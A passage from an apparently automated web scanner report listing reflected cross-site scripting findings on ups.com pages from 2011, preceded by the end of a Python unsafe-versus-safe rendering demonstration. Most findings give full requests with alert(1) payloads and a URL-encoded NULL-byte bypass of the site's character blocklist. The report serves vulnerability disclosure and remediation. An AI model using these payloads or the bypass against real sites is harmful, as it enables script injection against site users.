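        + "returnToField = '/myups/finishlogin?auto=1&returnto=' + '/myups/info/home?loc=%s';\n" % encode_js_string(loc)
        + "</script>\n"
    )

def breaks_out(fragment: str) -> bool:
    """True if a rendered fragment shows one of the report's break-out shapes:
    an extra script block, a '"' inside the href value, or a quote or line
    feed inside the string literal."""
    low = fragment.lower()
    if low.count("<script") != 1 or low.count("</script") != 1:
        return True
    attr = fragment.split('href="', 1)[1].split('">\n<script>', 1)[0]
    literal = fragment.split("'/myups/info/home?loc=", 1)[1].split("';\n", 1)[0]
    return '"' in attr or "'" in literal or "\n" in literal

if __name__ == "__main__":
    for p in REPORT_PAYLOADS:
        print(repr(p), "unsafe:", breaks_out(render_unsafe(p)),
              "safe:", breaks_out(render_safe(p)))
```

The blocklist the application relies on is the wrong layer: the %00 findings show it can be skipped, whereas encoding at the write site does not depend on what the filter saw. html.escape with quote=True also covers single-quoted attributes, and the \xHH escaping keeps a line feed from ending either a comment or a string, which is exactly the shape of the %0a REST-parameter findings.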

1.423. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9f22'%3b5a005591ca8 was submitted in the REST URL parameter 2. This input was echoed as d9f22';5a005591ca8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/homed9f22'%3b5a005591ca8 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44401


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
591ca8';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homed9f22';5a005591ca8';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myWorkspace/homed9f22';5a005591ca8';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.424. https://www.ups.com/myWorkspace/home [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004df24"><script>alert(1)</script>e2b70b6725a was submitted in the loc parameter. This input was echoed as 4df24"><script>alert(1)</script>e2b70b6725a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/home?loc=en_US%004df24"><script>alert(1)</script>e2b70b6725a&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_4df24"><script>alert(1)</script>e2b70b6725a&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_4df24%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be2b70b6725a%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.425. https://www.ups.com/myWorkspace/home [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003b705'-alert(1)-'675be0e7959 was submitted in the loc parameter. This input was echoed as 3b705'-alert(1)-'675be0e7959 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/home?loc=en_US%003b705'-alert(1)-'675be0e7959&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'675be0e7959';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_3b705'-alert(1)-'675be0e7959';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_3b705'-alert(1)-'675be0e7959';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.426. https://www.ups.com/myWorkspace/home [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %007d10a</script><script>alert(1)</script>21c1fea2813 was submitted in the loc parameter. This input was echoed as 7d10a</script><script>alert(1)</script>21c1fea2813 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/home?loc=en_US%007d10a</script><script>alert(1)</script>21c1fea2813&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_7d10a</script><script>alert(1)</script>21c1fea2813';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_7d10a</script>
...[SNIP]...

1.427. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 82b5e%0a3c917cf9f81 was submitted in the REST URL parameter 2. This input was echoed as 82b5e, followed by a literal line feed, followed by 3c917cf9f81 in the application's response.

This behaviour demonstrates that the line feed terminates the JavaScript rest-of-line comment into which our data is being copied, so that whatever follows it is parsed as JavaScript. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref82b5e%0a3c917cf9f81 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44406


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspref82b5e
3c917cf9f81
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspref82b5
...[SNIP]...

1.428. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 482d2"%20a%3db%2082ed3444b68 was submitted in the REST URL parameter 2. This input was echoed as 482d2" a=b 82ed3444b68 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref482d2"%20a%3db%2082ed3444b68 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44507


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myWorkspace/wspref482d2" a=b 82ed3444b68">
...[SNIP]...

1.429. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faefa'%3b3a06bbe69ac was submitted in the REST URL parameter 2. This input was echoed as faefa';3a06bbe69ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspreffaefa'%3b3a06bbe69ac HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44423


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
69ac';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspreffaefa';3a06bbe69ac';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspreffaefa';3a06bbe69ac';
actionUrl = "/one-to-one/login?ID=100&loc=
...[SNIP]...

1.430. https://www.ups.com/myWorkspace/wspref [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cd059"><script>alert(1)</script>d77ec82d71c was submitted in the loc parameter. This input was echoed as cd059"><script>alert(1)</script>d77ec82d71c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref?loc=en_US%00cd059"><script>alert(1)</script>d77ec82d71c&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_cd059"><script>alert(1)</script>d77ec82d71c&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_cd059%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bd77ec82d71c%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.431. https://www.ups.com/myWorkspace/wspref [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0010244'-alert(1)-'35d1037df28 was submitted in the loc parameter. This input was echoed as 10244'-alert(1)-'35d1037df28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref?loc=en_US%0010244'-alert(1)-'35d1037df28&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
1)-'35d1037df28';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_10244'-alert(1)-'35d1037df28';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_10244'-alert(1)-'35d1037df28';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.432. https://www.ups.com/myWorkspace/wspref [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0091f4c</script><script>alert(1)</script>899bae98079 was submitted in the loc parameter. This input was echoed as 91f4c</script><script>alert(1)</script>899bae98079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref?loc=en_US%0091f4c</script><script>alert(1)</script>899bae98079&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_91f4c</script><script>alert(1)</script>899bae98079';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_91f4c</script>
...[SNIP]...

1.433. https://www.ups.com/myups/addresses [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 88949%0abe6574ffdd3 was submitted in the REST URL parameter 2. This input was echoed as 88949, followed by a literal line feed, followed by be6574ffdd3 in the application's response.

This behaviour demonstrates that the line feed terminates the JavaScript rest-of-line comment into which our data is being copied, so that whatever follows it is parsed as JavaScript. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses88949%0abe6574ffdd3 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myups/addresses88949
be6574ffdd3
?appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myups/addres
...[SNIP]...

1.434. https://www.ups.com/myups/addresses [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94431'%3b510e598237 was submitted in the REST URL parameter 2. This input was echoed as 94431';510e598237 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses94431'%3b510e598237 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44464


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
pid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myups/addresses94431';510e598237?appid=IMS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myups/addresses94431';510e598237?appid=IMS';
actionUrl = "/one-to-one/l
...[SNIP]...

1.435. https://www.ups.com/myups/addresses [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5da4"%20a%3db%20f7ea2fc3fef was submitted in the REST URL parameter 2. This input was echoed as e5da4" a=b f7ea2fc3fef in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. Note that the affected element is a hidden input (type="Hidden"), which is neither rendered nor focusable, so injected event-handler attributes have no ordinary trigger; a working attack would need to close the tag. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addressese5da4"%20a%3db%20f7ea2fc3fef HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44559


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myups/addressese5da4" a=b f7ea2fc3fef?appid=IMS">
...[SNIP]...

1.436. https://www.ups.com/myups/addresses [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %00ec2ae</script><script>alert(1)</script>5826b439ddd was submitted in the loc parameter. This input was echoed as ec2ae</script><script>alert(1)</script>5826b439ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Although the reflection point lies inside a // comment, the HTML parser closes the script element at the first </script> sequence without regard to JavaScript comment syntax, so the <script>alert(1)</script> block that follows is parsed and executed as a new script element.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses?loc=en_US%00ec2ae</script><script>alert(1)</script>5826b439ddd&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_ec2ae</script><script>alert(1)</script>5826b439ddd&appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_ec2ae
...[SNIP]...

1.437. https://www.ups.com/myups/addresses [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

